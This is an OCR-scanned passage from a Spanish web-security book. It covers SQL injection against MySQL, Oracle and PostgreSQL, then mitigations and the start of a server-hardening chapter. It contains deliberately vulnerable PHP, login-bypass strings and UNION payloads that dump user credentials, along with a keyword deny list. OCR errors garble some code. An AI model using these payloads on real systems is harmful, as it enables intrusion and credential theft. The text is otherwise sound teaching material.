generando una respuesta inevitablemente verdadera. 


La inyección SOL que realicemos puede variar: solo necesitamos 
lograr que la base de datos responda con un valor superior a cero, 
lo que significa, para la aplicación vulnerable, que el usuario y la 
contraseña ingresados realmente existen. Algunos ejemplos de 
inyecciones de este tipo son: *OR 'x'=*“x, *OR “0'='0 y *OR"=“. 

En un ataque real no podremos ver el código fuente de la aplicación 
—por lo cual no sabremos bien cómo está formada la consulta original- 
pero podemos descubrirlo a prueba y error. En algunos casos, será 
necesario añadir un usuario que exista e inyectar el código en el campo 
de contraseña para autenticarnos sin conocer su clave. En otros, en cambio, 
no es preciso realizar la inyección a los dos campos, sino que puede bastar 


"AS 


SALTAR SISTEMAS DE AUTENTICACIÓN 


Existen otros métodos para saltar sistemas de autenticación, que no utilizan inyecciones de código SQL en 


los campos del formulario de acceso. Podemos leer al respecto en la siguiente documentación de OWASP: 
www.owasp.org/index.php/Testing for Bypassing Authentication_Schema_(OWASP-AT-005). 
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con inyectar solamente a uno. También, dependiendo de la estructura 
de la consulta original, será necesario quitar o agregar comillas simples. 


Unión de consultas 


Dentro del lenguaje SOL contamos con el operador UNION, que se 
utiliza para combinar las respuestas de más de una consulta SELECT en 
un único conjunto de resultados. Dicho de otro modo, mediante UNION 
podemos unir a la consulta original otra petición creada por nosotros. 
Debemos tener en cuenta que este operador tiene sus particularidades: 
requiere que tanto la primera consulta como la segunda tengan la 
misma estructura y consulten el mismo número de columnas, que a 
su vez, deberán tener el mismo tipo de dato. Veamos un ejemplo de 
consulta SQL utilizando el operador UNION: 


SELECT columnal,columna2 FROM tablal UNION SELECT 
columnal,columna2 FROM tabla2 


Para aclarar las dudas, vamos a programar una aplicación vulnerable 
a inyección SQL y la explotaremos utilizando este operador: 


<?php 
include('conexion_a_db.php”); 


$id = $_GETC'id'J; 
$query = mysql_query("SELECT id,Nombre,Precio FROM "productos WHERE id=$id"”"); 
while ($row = mysql_fetch_assoc ($query)) ( 


print “Nombre: “.$Srow["Nombre”]. “<br />"; 
print “Precio: “.$row[ “Precio”]. “<br /> “; 


mysql_close(); 
2> 
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Este código es de una típica aplicación 


EL OPERADOR web comercial que muestra información de sus 
UNION COMBINA productos, almacenados en una base de datos. 
La consulta SOL buscará en la tabla productos 
LAS RESPUESTAS las columnas id, nombre y precio del registro 
DE MÁS DE UNA donde el identificador equivalga al ingresado 
por el usuario en la variable id desde la URL. 
CONSULTA Guardamos el código vulnerable en el archivo 


en 


productos.php y accedemos desde el navegador 

pasándole un id de parámetro: productos.php?id=1. 
El resultado será el nombre y el precio del producto con identificador 
número uno en la tabla de productos. 

Intentemos unir a la consulta original otra creada por nosotros 
mediante el operador UNION. Simulando un ataque real, donde no 
conocemos el código de la aplicación vulnerable, el primer paso 
será averiguar la estructura de la consulta original para crear una 
petición correcta: 


productos.php?id=1 UNION SELECT 1 


Mostrará un error porque la segunda petición está consultando 
a una sola columna, cuando en realidad la primera solicita tres. 
Debido a que, supuestamente, desconocemos esto, tendremos 
que ir incrementando el número de columnas hasta que el error 
desaparezca. En este caso, dado que la primera consulta solicita 
tres columnas (id, nombre y precio), el error desaparece cuando 
creamos la segunda consulta solicitando también tres columnas. 


productos.php?id=-1 UNION SELECT 1,2,3 


Le pasamos a la primera consulta un identificador -1, para que 
no muestre información que no interesa. 

En lugar de un error, visualizaremos números listos para ser 
inyectados, tal como se observa en la Figura 17. 
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Productos 14 


$ decano 
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PRODUCTOS 


Nombre: 2 


Precio: 3 


Figura 17. Descubrimos la estructura de la consulta original 
y creamos otra igual, unida a ella mediante el operador UNTON. 


Obtención de datos útiles 


Una vez logrado el primer paso, tenemos armada correctamente 
nuestra consulta. Es hora de atacar y empezar a conseguir datos útiles 
sobre el servidor, el DBMS y la aplicación web, mediante la realización 
de inyecciones SOL maliciosas. Deberemos seleccionar una de las 
columnas para solicitar datos (en este caso, la dos o la tres, ya que la 
uno no se muestra en pantalla). 

Realizaremos la primera inyección SQL consultando la versión de 
MySQL que utiliza el servidor: 


productos.php?id=-1 UNION SELECT 1,version(),3 


INYECCIONES EXTRA LARGAS 


Puede suceder que la consulta original de la aplicación vulnerable esté trayendo resultados de una gran 
cantidad de columnas. En ese caso, cuando intentemos unirle otra petición creada por nosotros, tendre- 
mos que ser pacientes a la hora de descubrir el número exacto de columnas. Posiblemente nos quede 
una inyección bastante larga: UNION SELECT 1,2,3,4,5,(...),28,29..... 
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Como hemos elegido el número dos, que corresponde a la columna 
nombre, al enviar esa consulta visualizaremos la versión de MySQL 
en el lugar donde aparecería el nombre del producto. Podría ser algo 
similar a: 5.5.20-log. 

De la misma manera, podemos averiguar otros datos interesantes 
sobre el servidor y el DBMS: 


e  database() nos devolverá el nombre de la base de datos que está 
siendo utilizada por la aplicación vulnerable: 


productos.php?id=-1 UNION SELECT 1,database(),3 


e current_user() nos devuelve el nombre de usuario y del host; también 
podemos probar con user(): 


productos.php?id=-1 UNION SELECT 1,current_user(),3 


e CCdatadir devuelve la ruta completa donde se encuentra alojada la 
base de datos: 


productos.php?id=-1 UNION SELECT 1, Cdatadir,3 


D COMENTARIOS EN SQL 


En algunos casos, para que una inyección SQL se ejecute de manera correcta es necesario agregar 
un carácter de comentario al final. Ese carácter, que indica el comienzo de un comentario, puede 
variar según el gestor de bases de datos utilizado. El DBMS MySQL soporta los siguientes caracte- 
res: “*$” (numeral) “-- * (dos guiones medios seguidos de un espacio en blanco) y, por último, “/*” 


(barra y asterisco). 


»  www.redusers.com www.detodoprogramacion.com 


WEB HACKING 


Productos + 


L T localhost 


DEA 269 


Ú Disable» di Cootier” Y 05% [Y formo” Jl Imager” Q Intemmaticn” Él Miscebanecno 4 Curie» Y Beiro” A Tocino ME View Source” 8: Optiens" 


Figura 18. Nombre de usuario y host 
obtenidos mediante una inyección SQL. 


Bases de datos al descubierto 


PRODUCTOS 


Mombre: rootOPlocalhost 


Precio: 3 


Es hora de avanzar un poco más en materia de ataques y realizar 


inyecciones SQL con mayor nivel de complejidad. 


Ya mencionamos dos bases de datos que pertenecen al DBMS 


MySQL: information_schema y mysql. Debido a que 

la primera de ellas contiene información sobre 

la estructura de todas las bases del servidor, nos 

concentraremos en realizar consultas que extraigan 

de sus tablas aquello que necesitamos saber. 
Empecemos por descubrir todas las bases 

alojadas en el servidor web. La tabla schemata 

(de la DB information_schema) contiene una columna 

llamada schema_name, que almacena los nombres 

de todas las bases de datos. Creamos, entonces, la 

siguiente consulta: 


ES POSIBLE EXTRAER 
INFORMACIÓN SOBRE 
LA ESTRUCTURA DE 
TODAS LAS BASES 
DEL SERVIDOR 


5 


-1 UNION SELECT 1,schema_name,3 FROM information_schema.schemata 


Obtuvimos lo que necesitábamos: los nombres de cada base de datos 
alojada en el servidor, incluyendo a information_schema y mysql. Muchas 
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veces buscamos algo que no se encuentra en la base utilizada por la 
aplicación sino en otra, por lo cual es muy útil consultar las existentes. 
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PRODUCTOS 


Figura 19. Obtención de los nombres de las bases 
de datos que se alojan en el servidor web. 


Tengamos presente que puede suceder que el usuario de MySQL 
que realice las consultas tenga permisos para acceder únicamente a 
información de la base de datos de la aplicación, y no a las demás. 


Buscar tablas interesantes 


Como atacantes no nos interesa en lo más mínimo la tabla de 
productos, así que realizaremos una consulta que muestre cuáles son 
las demás tablas, con la esperanza de encontrar alguna interesante. 

La tabla tables de information_schema tiene una columna 
denominada table_name, que almacena los nombres de las tablas de 
todas las bases de datos. Entonces, podemos armar dos consultas 
diferentes que sirven por igual: 


productos.php?id=-1 UNION SELECT 1,table_name,3 FROM 
information_schema.tables 
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Se traerán absolutamente todas las tablas, de todas las bases de 
datos del servidor, en las que el usuario tenga permisos de acceso 
(incluyendo information_schema y mysql). También podríamos ser más 
prolijos e indicar una condición mediante la cláusula WHERE para 
obtener las tablas de una base específica: 


productos.php?id=-1 UNION SELECT 1,table_name,3 FROM 
information_schema.tables WHERE table_schema = “test” 


Protuctos ¡2 
$ duos 


D Dual dl Cocer Y Ci [] tomo Bl images U intemañcor El Maceimenar / Ouine Y haria K Too Ue View Sowcer 4: Options" 


PRODUCTOS 


Nombre: paises 
Precio: 3 
Nombre: productos 
Precio: 3 
Hombre: usuarios 


Precio: 3 


Figura 20. Descubrimos las tablas de la base 
de datos cuya información nos interesa. 


En este caso, encontramos una tabla llamada usuarios 
que probablemente contenga las credenciales de acceso para la 
administración del sitio. En aplicaciones reales podemos encontrar 
más tablas con información interesante. 


Acceso a columnas 


Poco a poco, nos acercamos a lo que queremos descubrir. Ahora 
nos toca averiguar cuáles son las columnas de la tabla de usuarios. 
Consultaremos de nuevo a information_schema, específicamente a la 
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columna column_name de la tabla columns. Si la información que nos 
interesa se encuentra dentro de la base utilizada por la aplicación 
vulnerable, ejecutaremos la siguiente consulta: 


productos.php?id=-1 UNION SELECT 1,column_name,3 FROM 
information_schema.columns WHERE table_name = “usuarios” 


En el caso de que nos interese la tabla de otra base de datos 
tendremos que hacer uso del operador AND para indicar su nombre 
dentro de la condición: 


productos.php?id=-1 UNION SELECT 1,column_name,3 FROM information_ 
schema.columns WHERE table_name = “usuarios' AND table_schema = “test' 


Pot 


€ 0 mea RE 
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+ 


PRODUCTOS 


Figura 21. Nos acercamos aún más a la información que buscamos, 
descubriendo las columnas de la tabla usuarios. 
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La consulta se vuelve bastante compleja, pero si 


aprendemos la sintaxis de SOL resultará fácil armar EN UNA CONSULTA 
cada una. Tomemos nota de los nombres de las COMPLEJA PODEMOS 


columnas cuya información queremos ver, ya que 


utilizaremos tales datos en las próximas consultas. ACCEDER A LOS 
DATOS DE USUARIOS 


Lectura de registros Y SUS CONTRASEÑAS 


Alcanzamos el paso final: leer los registros que 
nos interesan. Si bien dentro de la tabla usuarios 
tenemos un total de cinco columnas, basta con conocer los datos 
de las columnas User y Pass. Hay varias formas de armar la consulta 
para extraer esos registros: una podría ser utilizar la columna dos para 
mostrar los datos de User y la columna tres para los de Pass; otra es usar 
una función de concatenación y mostrar ambos datos en una misma 
columna. Intentemos de ambas maneras para entender sus diferencias. 
Comenzaremos con el primer método, solicitando la información de 
User y Pass en las columnas dos y tres, respectivamente: 


productos.php?id=-1 UNION SELECT 1,User,Pass FROM test.usuarios 


El nombre de usuario ocupará el nombre del producto y su 
contraseña aparecerá en lugar del precio. Podemos encontrarnos ante 
un escenario donde veamos el resultado de la inyección en una sola 
columna; en ese caso, haremos uso de la función concat para realizar 
una concatenación de los datos: 


DN DESCUBRIR APLICACIONES VULNERABLES 


de 


Primero tendremos que ser persuasivos y descubrir si la aplicación web está solicitando información a 
una base de datos. Luego, buscar una entrada donde podamos inyectar código en la consulta original. 
La prueba clásica es empezar inyectando una comilla simple (*) o punto y coma (+), para generar un error 
de sintaxis en la consulta SQL original. 
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-1 UNION SELECT 1,concat(User,:”,Pass),3 FROM test.usuarios 


Utilizamos la columna dos para inyectar la concatenación de User y 
Pass. De este modo, visualizaremos el usuario y su contraseña separados 
por dos puntos (:) en el lugar donde aparecería el nombre del producto. 

Prot + 
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hombre. Admin 
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Hombre: CapitanPrice 


Precio: Tob759 


Nombre: Kil 


Precio: 111110 


Nombre: MIQi 


Precio: Mic2012 


Figura 22. Logramos el objetivo: obtener los usuarios 
de la aplicación web, con sus respectivas contraseñas. 


En este escenario de práctica, los usuarios 


ORACLE DATABASE almacenaron las contraseñas en texto plano; 
Y POSTGRESQL en una situación real, probablemente no sea así. 

, Las claves pueden estar representadas en formato 
SON TAMBIEN hash mediante un algoritmo como MD5, SHA1 
VULNERABLES A o cualquier otro de este tipo, por lo cual habrá 


que distinguir cuál es el algoritmo empleado y 


INYECCIONES SQL usar alguna herramienta o servicio online (como 


www.onlinehashcrack.com) para descubrir la 


contraseña original. 
Finalmente, ingresamos a la administración con las credenciales 


robadas y nos apoderamos de la base de datos, la aplicación web y, 
dependiendo de nuestra habilidad, del servidor web completo. 
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Inyección SOL en Oracle 
Database y PostgreSQL 


La técnica de inyección SOL afecta a todos los DBMS que utilicen 
SQL para definir y manipular la información de sus bases de datos. 

Oracle Database y PostgreSQL son gestores que utilizan este 
lenguaje. Una aplicación vulnerable a inyecciones SQL que utilice 
cualquiera de estos DBMS podrá ser explotada, permitiendo a un hacker 
acceder a la administración sin conocer credenciales válidas, o explorar 
toda la base de datos en busca de información que le resulte útil. 

La estructura de una inyección SQL puede variar según el DBMS 
que utilice la aplicación vulnerable. Cuando aprendimos a realizar 
inyecciones a MySQL, averiguamos la información que nos interesaba 
consultando a information_schema, una base creada por defecto en 
MySQL, que por lo general no está presente en otros gestores (como 
Oracle Database). Si realizamos las inyecciones aprendidas sobre una 
aplicación que utilice un DBMS diferente a MySQL, posiblemente no 
funcionen, ya que cada gestor crea sus propias bases de datos por 
defecto. Conozcamos cuáles son estas bases en otros gestores para 
realizar las inyecciones SQL de forma correcta. 


Oracle Database en peligro 


En primer lugar desarrollaremos una aplicación vulnerable a 
inyecciones SQL muy similar a la que utilizamos con MySQL, pero 
donde el DBMS será Oracle Database, por lo que las funciones PHP 
serán diferentes. 


<?php 
$conx = oci_connect(“system”, “password”, “localhost/XE”); 


$id = $_GETC' id"); 


$query = oci_parse($conx, “select nombre from productos where id = $id”); 
oci_execute($query); 
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while ($row = oci_fetch_assoc ($query)) ( 


print “Nombre: “.$row"NOMBRE”“1.“<br/> "; 


oci_close($conx); 
2> 


En un principio se declara la conexión a la base de datos y 
una variable llamada id, que recibe su valor a través de la barra de 
direcciones. La consulta SQL utiliza el comando SELECT para mostrar 
el nombre del producto donde el identificador (id) dentro de la tabla 
sea equivalente al ingresado por el usuario. Finalmente, imprime el 
dato en pantalla y cierra la conexión con la base de datos. 

La aplicación es claramente vulnerable a inyecciones SQL. La 
variable id no posee ningún tipo de validación: lo que ingrese el 
usuario formará la consulta final y será ejecutada por el gestor 
(en este caso, Oracle Database). 

Comencemos con las inyecciones SQL. En este caso, obtenemos el 
nombre de la base de datos utilizada por la aplicación vulnerable: 


productos_oracle.php?id=-1 UNION SELECT global_name FROM global_name 


Ejemplo de resultado: XE (base de datos por defecto). Obtenemos la 
versión de Oracle Database instalada en el servidor web: 


productos _oracle.php?id=-1 UNION SELECT version FROM v$instance 


Ejemplo de resultado: 10.2.0.1.0. Averiguamos el nombre del servidor web: 


productos_oracle.php?id=-1 UNION SELECT UTL_INADDR.get_host_name 
FROM dual 
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Ejemplo de resultado: SERVIDORWEB-PC. Conseguimos el nombre 
de usuario de la base de datos utilizado por la aplicación vulnerable: 


productos oracle.php?id=-1 UNION SELECT user FROM dual 


Ejemplo de resultado: SYSTEM. 
Aatbearas 
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Nombre: SYSTEM 


Figura 23. En esta figura vemos el nombre 
de usuario utilizado por la aplicación vulnerable. 


Una vez que obtuvimos información interesante sobre el servidor 
y la base de datos, procedemos a explorar las tablas que contiene: 


productos_oracle.php?id=-1 UNION SELECT table_name FROM all_tables 


O, siendo un poco más precisos, podemos ver solamente las tablas 
a las que accede el usuario utilizado por la aplicación vulnerable: 


productos_oracle.php?id=-1 UNION SELECT table_name FROM all_tables 
WHERE owner ='SYSTEM' 
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En este caso obtendremos como resultado las tablas de usuarios y 
productos. Averigúemos cuáles son las columnas de la tabla de usuarios: 


productos oracle.php?id=-1 UNION SELECT column_name FROM all_tab_ 
columns WHERE table_name ='USUARIOS” 


Es importante que el nombre de la tabla esté escrito en letras 
mayúsculas, ya que de lo contrario no veremos resultados. 


Productos lal ” 
ES locals? erez cacte pi Y UNION SELECT . y EFI tobie name 50 | 


(D Disable» de Coctier Y 0556 [Y Forme ll images” Y intometon Él Minceiaseneo / Outino- Y Resizer A Tool ME View Seurre- (8. Optiens” 
PRODUCTOS - ORACLE 


Nombre: APELLIDO 
Nombre: ID 
Nombre: NOMBRE 
Nombre: PASSWD 


Mombre: USUARIO 


Figura 24. Mediante esta inyección SQL se obtienen las columnas 
de la tabla de usuarios, ordenadas alfabéticamente. 


Finalmente, obtenemos todos los registros de las columnas que nos 
interesan, en este caso usuario y passwd: 


productos_oracle.php?id=-1 UNION SELECT concat(usuario,passwd) FROM 
usuarios 


Puede que estas inyecciones resulten un poco extrañas si las 
comparamos con las que realizamos al gestor MySQL. De todos modos, 
cuanto más sepamos del funcionamiento interno de Oracle Database 
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más fácil nos resultará llevar a la práctica inyecciones SQL sobre 
las aplicaciones vulnerables que lo utilicen. 


PostgreSQL 


Al igual que con Oracle Database, desarrollaremos la aplicación 
vulnerable a inyecciones SOL para realizar nuestras prácticas: 


<?php 

$conx = pg_connect(“host=localhost port=5432 
dbname=Test user=postgres password=pass”); 
$id = $_GETC'id'); 


$query = pg_query($conx, “select nombre from 
productos where id = $id”); 


while ($row = pg_fetch_assoc ($query)) ( 


print “Nombre: “.$rowL"nombre”]. “<br />"; 
) 
pg_close($conx); 
?> 


Mediante este script PHP nos conectamos a la base de datos Test, 
donde han sido creadas las tablas necesarias para realizar la práctica. 
La consulta SOL sigue siendo la que utilizamos anteriormente: 
solicitamos el nombre del producto cuyo id equivalga al ingresado 
por el usuario, a través de la URL. Obtenemos la versión de PostgreSQL 
instalada en el servidor web: 


productos postgre.php?id=-1 UNION SELECT version() 


Ejemplo de resultado: PostgreSQL 9.2.4. Averiguamos el nombre de la 
base de datos utilizada por la aplicación vulnerable: 
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productos _postgre.php?id=-1 UNION SELECT current_database() 


Ejemplo de resultado: Test. Obtenemos los nombres de todos los 
usuarios creados en el DBMS: 


productos postgre.php?id=-1 UNION SELECT usename FROM pg_user 


También podemos ver únicamente el que está siendo utilizado por la 
aplicación vulnerable: 


productos_postgre.php?id=-1 UNION SELECT current_user 


Ejemplo de resultado: Postgres. 


Productos + 
€ 4 ucemnon 


O Dusbie" di Coobes" Y CS [] Forme Bl Images UY Irtomator fl Macelisnecur 7 Oitine: Y Resicer A Tout” ME View Source” ¿1 Options 
PRODUCTOS - PostgreSQL 


Nombre: postgres 


Figura 25. Nombre de usuario utilizado 
por la aplicación vulnerable a inyecciones SQL. 


Continuamos averiguando cuáles son las bases de datos que existen 
dentro del servidor: 
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productos postgre.php?id=-1 UNION SELECT datname FROM pg_database 


Como resultado veremos las bases de datos template0 y templatel, 
que vienen por defecto en PostgreSQL. Luego podemos observar los 
nombres de las que hayan sido creadas por el administrador. 


Es el turno de ver las tablas que existen dentro de la base. La forma de 


lograrlo resultará más familiar, ya que PostgreSQL, al igual que MySQL, 
cuenta con la base information_schema. Procedamos a obtener las tablas: 


productos postgre.php?id=-1 UNION SELECT table_name FROM information _ 
schema.tables 


Dentro del resultado obtenido, buscaremos la tabla de usuarios y 
averiguaremos cuáles son sus columnas: 


productos postgre.php?id=-1 UNION SELECT column_name FROM information _ 
schema.columns WHERE table_name ='usuarios' 


Prodi tes -. 
SS 


$ ocinoa 
OQ Vueble" di Covue Y 155 Li toreo Ml image: O tomar” l Macelarera: Y Duce Y Pao K Tom ME Ves Jour” 1 Open 


PRODUCTOS - PostgreSQL 


Morrbre: nombre 

Nombre: usuario 

Mombre apellido 
Nombre: ld 


Hombre. passwd 


Figura 26. Las columnas de la tabla de usuarios son 


id, nombre, apellido, usuario y passwd. 
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El paso final es obtener los registros que existan dentro de la tabla 
de usuarios en las columnas de usuario y passwd, que son las que 
nos interesan: 


productos_postgre.php?id=-1 UNION SELECT concat(usuario/:*,passwd) 
FROM usuarios 


De este modo, obtendremos los nombres de usuario con sus 
respectivas contraseñas separados por dos puntos (:) en el lugar del 
nombre del producto. Por ejemplo: 


Nombre: Admin:admin_postgre 
Nombre: Kii:111110_postgre 
Nombre: MiQi:Miic_postgre 


Como conclusión, nuestras inyecciones SQL deberán adaptarse al 
DBMS que esté utilizando la aplicación vulnerable. Las bases y tablas 
instaladas por defecto no siempre son las mismas, pueden llamarse 
de manera distinta y/o tener otra estructura de datos. 


Protección contra 
inyección SQL 


Comprendido el ataque, apliquemos la defensa. Luego de instalar 
MySQL explicamos varias medidas de seguridad que deben ser 
implementadas siempre que se utilice este gestor. Cada DBMS tiene 
su propia documentación de seguridad, que podemos consultar en 
los archivos de ayuda o sitios web oficiales. Siempre es necesario 
que aseguremos tanto el servidor web y de bases de datos como 
el código de la aplicación. 

En esta sección aprenderemos a defendernos contra ataques 
de inyección SOL mediante el desarrollo de código seguro y otras 
protecciones dentro de la aplicación, y en el próximo capítulo veremos 
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las medidas de seguridad que podemos implementar para proteger 
el interior del servidor web. 


Desarrollo de código seguro 


Debido a que este es el último capítulo que dedicaremos a 
la protección de aplicaciones desde su código fuente, haremos 
una mención especial a los proyectos de la fundación OWASP y sus 
documentos sobre las vulnerabilidades que afectan a las aplicaciones 
web, ya que son de gran ayuda para desarrollar aplicaciones seguras. 
Además del Top Ten OWASP, un ranking de diez posiciones con las 
vulnerabilidades más explotadas durante el año, OWASP ofrece otros 
materiales útiles y gratuitos: 


e Guía de desarrollo de OWASP: es un manual muy completo para 
diseñar, desarrollar y liberar aplicaciones y servicios web seguros. 
Podemos obtener información sobre este proyecto en: www.owasp. 
org/index.php/Proyecto Guia _de_OWASP. También tenemos a 
disposición en idioma español una guía breve, con las prácticas de 
desarrollo de código seguro al programar aplicaciones web (www. 
owasp.org/images/c/c8/OWASP_SCP_Quick_Reference_Guide_ 
SPA.doc). 

e Guía de pruebas de OWASP: es un manual muy útil para realizar 
auditorías de seguridad a las aplicaciones y servicios web. Podemos 
descargar la versión tres, en español, desde el siguiente enlace: 
wWWww.owasp.org/images/8/80/Guía_de pruebas_de_OWASP_ 
ver_3.0.pdf. 

e Guía de revisión de código de OWASP: cubre las mismas 
vulnerabilidades y mecanismos de seguridad que la guía de pruebas, 
pero provee lineamientos para encontrar los problemas en el código 


DN COMILLAS SIMPLES EN SQL 


Las comillas simples ('), en el lenguaje SQL, indican el comienzo o final de una cadena de caracteres 
dentro de la consulta. Podemos utilizarlas para provocar errores de sintaxis en una aplicación vulnerable 


O para concatenar nuestras inyecciones a la consulta original. 


www.detodoprogramacion.com www.redusers.com < 


284 0 9. INYECCIÓN SQL A BASES DE DATOS 


fuente. Es útil al momento de auditar aplicaciones 
ESPECIFICAR EL que ya hemos desarrollado y sirve para diversos 
TIPO DE DATO DE UNA lenguajes (como PHP, ASP, Java, SQL, etcétera). 

Encontramos más información y descargas en: 
VARIABLE EN PHP ES www.owasp.org/index.php/Projects/OWASP_ 
UNA BUENA MEDIDA Code_Review_Project. 

Recomendamos continuar con la lectura de esas 

DE SEGURIDAD guías para seguir mejorando la seguridad de las 

aplicaciones web que desarrollemos. 
E AS En las próximas secciones trataremos varias 

medidas de protección que podemos implementar en el código de 


nuestra aplicación web para evitar la técnica de inyección SQL. 


Verificar el tipo de dato 


Si bien en PHP no es obligatorio especificar el tipo de dato que 
almacena una variable, es una excelente medida de seguridad, sobre 
todo si el valor es asignado directamente por el usuario. Debemos 
aplicarlo desde el lado del desarrollador, dentro del código. 
Tomemos como ejemplo las aplicaciones que hemos explotado 
a lo largo del capítulo: 


<?php 
include('conexion_a_db.php”); 


$id = $ GETC'id'); 


$query = mysql _query(“SELECT id, Nombre, Precio FROM "productos WHERE 
id=$id" ); 


while ($row = mysql_fetch_assoc ($query)) £ 


print “Nombre: “.$row["Nombre”]. “<br/>"; 
print “Precio: “.$Srow[“Precio”]. “<br/>"; 


mysql_close(); 
2> 
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En esta aplicación la variable id debe recibir siempre un valor 
numérico para formar correctamente la consulta SOL, pero en ninguna 
parte del código se especifica que debe ser así. Para hacerlo tenemos 
que modificar la línea que declara la variable id: 


$id = (int) $ GET['id”); 


De este modo, dejamos establecido que la variable id almacenará un 
valor de tipo integer (numérico) e ignorará por completo algo diferente. 
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Figura 27. Al recibir una cadena de caracteres (string), 
la aplicación la ignora y no muestra resultados. 


Filtro de palabras claves 


Sabemos cuáles son las palabras utilizadas para formar una 
inyección SQL maliciosa. Sobre esta base, podríamos crear un script 
que revise los datos de entrada en busca de esas palabras claves 
(por ejemplo UNION, ALL, SELECT, FROM, WHERE, information_schema, 
etcétera) y las elimine antes de que se forme la consulta final y se 
envíe a la base de datos. 

A continuación podemos ver un script que realiza esa tarea sobre 
la variable entrada: 
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<?php 
Sentrada = $ GETl'entrada'); 


Sentrada = str_ireplace( “UNION” /*” Sentrada); 
Sentrada = str_ireplace(“"SELECT”/"” ¡$entrada); 
Sentrada = str_ireplace( “FROM” /'” Sentrada); 
Sentrada = str_ireplace( "WHERE" /*” Sentrada); 


print $Sentrada; 
2> 


Podemos evaluar el filtro de este simple código intentando pasar a 
la variable entrada una inyección SQL como las aprendidas. Notaremos 
que las palabras UNION, SELECT, FROM y WHERE son automáticamente 
eliminadas de la variable, sin diferenciar entre mayúsculas y minúsculas. 

A 

€ 30m Es 
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Figura 28. Mediante la función str_ireplace() 
se pueden eliminar las palabras claves de una inyección SQL. 


Procedimientos almacenados 


Los procedimientos almacenados o stored procedures son 
destinados, entre otros usos, a evitar ataques de inyección SQL. Sin 
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embargo, su uso inadecuado puede generar tanta vulnerabilidad a 
inyecciones SQL como las consultas realizadas por un usuario desde la 
página web. Este riesgo aparece si el procedimiento almacenado utiliza 
una entrada de datos para armar la consulta y, al igual que la aplicación 
web vulnerable, no la filtra correctamente. 

Si de todas maneras queremos utilizarlos para mitigar los riesgos 
de una inyección maliciosa, debemos implementarlos correctamente: 
no armar las consultas con SQL dinámico o, de ser necesario hacerlo, 
filtrar y proteger correctamente la entrada de datos. 


Análisis de respuesta 


Podemos desarrollar una aplicación más inteligente a la hora 
de analizar la respuesta de la consulta SOL antes de mostrársela 
al usuario. Por ejemplo, el código del formulario de acceso que 
saltamos al principio del capítulo simplemente analizaba la 
respuesta en busca de un cero o un número mayor, y eso era 
todo lo que necesitaba para validar el acceso a la aplicación. 
Tal código es muy poco inteligente, y por ende fácil de engañar. 
Debemos esforzarnos por programar aplicaciones que analicen 
minuciosamente los datos que reciben por parte del DBMS, para así 
evitar darle a un atacante la información que desea ver. 


"LAS 


a RESUMEN 


Hoy en día, los ataques de inyección SQL son los más ejecutados en lo que respecta a seguridad 
en aplicaciones web. Dedicamos este capítulo completo a analizar y explotar códigos vulnerables a 
dicho ataque y logramos obtener toda la información que queríamos de una base de datos (MySQL, 
Oracle Database y PostgreSQL). Por otro lado, vimos las cuestiones de seguridad básicas que 
debemos implementar al instalar el DBMS MySQL y varias medidas de protección contra inyeccio- 
nes de código maliciosas. 
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Actividades 


TEST DE AUTOEVALUACIÓN 


¿Cuáles son las características del modelo relacional de bases de datos? 
¿Cuáles son los DBMS más utilizados en la actualidad? 


¿Para qué se utilizan los comandos DDL y DML en SQL? 


Pb 0 N 


¿Qué tipo de información contienen las bases de datos information_schema y 
mysql del DBMS MySQL? 


5 ¿Cuáles son las medidas de seguridad básicas que debemos implementar al 
instalar el DBMS MySQL? 


6 ¿Cómo podemos saltar un sistema de autenticación mediante una inyección 
SQL? 


EJERCICIOS PRÁCTICOS 


1 Instale los DBMS MySQL, Oracle Database y PostgreSQL. 


2  Desarrolle aplicaciones vulnerables a inyección SQL que utilicen los DBMS 
instalados. 


3 Obtenga la mayor cantidad de información posible sobre el servidor web, la 
base de datos y el DBMS mediante inyecciones SQL. 


4 Obtenga las tablas, columnas y registros de la base de datos utilizada por 
cada una de las aplicaciones vulnerables que desarrolló. 


5 Asegure las aplicaciones vulnerables de modo que no se pueda seguir inyec- 
tando código SQL malicioso. 


rs PROFESOR EN LÍNEA 


Si tiene alguna consulta técnica relacionada con el contenido, puede contactarse 
con nuestros expertos: profesorOredusers.com 
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Seguridad 
en el servidor 


En este capítulo reforzaremos las medidas básicas 


de protección de un servidor web, añadiendo nuevas 
configuraciones que ayudarán a mitigar riesgos. 
Aprenderemos algo de hardening e instalaremos 


un firewall de aplicaciones web. 


w Reforzar las medidas w Sistemas de detección SS 
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—— Reforzar las medidas básicas 


En el Capítulo 1, luego de instalar Ubuntu Server, aprendimos 
las medidas de seguridad básicas que debíamos aplicar en nuestro 
servidor. Comenzamos eliminando las contraseñas por defecto de 

las aplicaciones utilizadas para asignarles una 
clave verdaderamente segura, verificamos los 


DESHABILITAR privilegios de los usuarios/grupos y sus 

FUNCIONES EN respectivos permisos sobre los archivos del 
servidor (para modificarlos en caso de ser 

PHP.INI FORTALECE inadecuados), y recomendamos editar las 

LA SEGURIDAD DE configuraciones por defecto de las aplicaciones 


en uso para evitar proporcionar al hacker 


NUESTRO SISTEMA información de su interés. Vimos también cómo 


en 


distribuir los servicios en diferentes servidores, 

de modo que si un atacante compromete a uno 
de éstos no pueda acceder a información de otros componentes (por 
ejemplo, una base de datos). Por último, mencionamos la importancia 
de los respaldos de información o backups y de mantener actualizado 
el sistema operativo de nuestro servidor web. 


Ataque a la aplicación 


E 


Ataque al servidor 


Hacker 'O) Servidor web 


Figura 1. Si el hacker no encuentra vulnerabilidades 
en la aplicación web, intentará hallarlas en el servidor. 


Dedicamos, en definitiva, gran parte del libro a detectar y resolver 
las fallas de programación que pudieran afectar la seguridad de la 
aplicación y los componentes relacionados. Es hora de aprender las 
técnicas de hardening: procesos de fortalecimiento de un sistema 
mediante ajustes en su configuración. En esta sección reforzaremos las 
medidas básicas de protección aprendidas en el Capítulo 1. 
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Eliminar peligros de PHP 


Al instalar el intérprete de PHP tendremos un archivo de configuración 
llamado php.ini. En capítulos anteriores aprendimos a realizar pequeñas 
modificaciones a su contenido para aumentar la seguridad. En esta 
sección, trataremos otras directivas disponibles en este archivo para 
prohibir funciones peligrosas, limitar las operaciones a un directorio 
específico o deshabilitar la subida de archivos, entre otras protecciones. 

Primero deberemos buscar el archivo php.ini. Su ubicación puede 
variar según el sistema operativo y la instalación que hayamos 
realizado: si usamos Linux podemos ejecutar el comando find / -name 
php.ini para encontrarlo, mientras que en Windows, si instalamos el 
paquete WAMP, podemos encontrar el php.ini en Ciwamplbinphpl 
php(versiónNphp.ini. 


Jbuntu 12,04,2 LTS us-shey ttyl 

5-shey login hey 
Passuord 
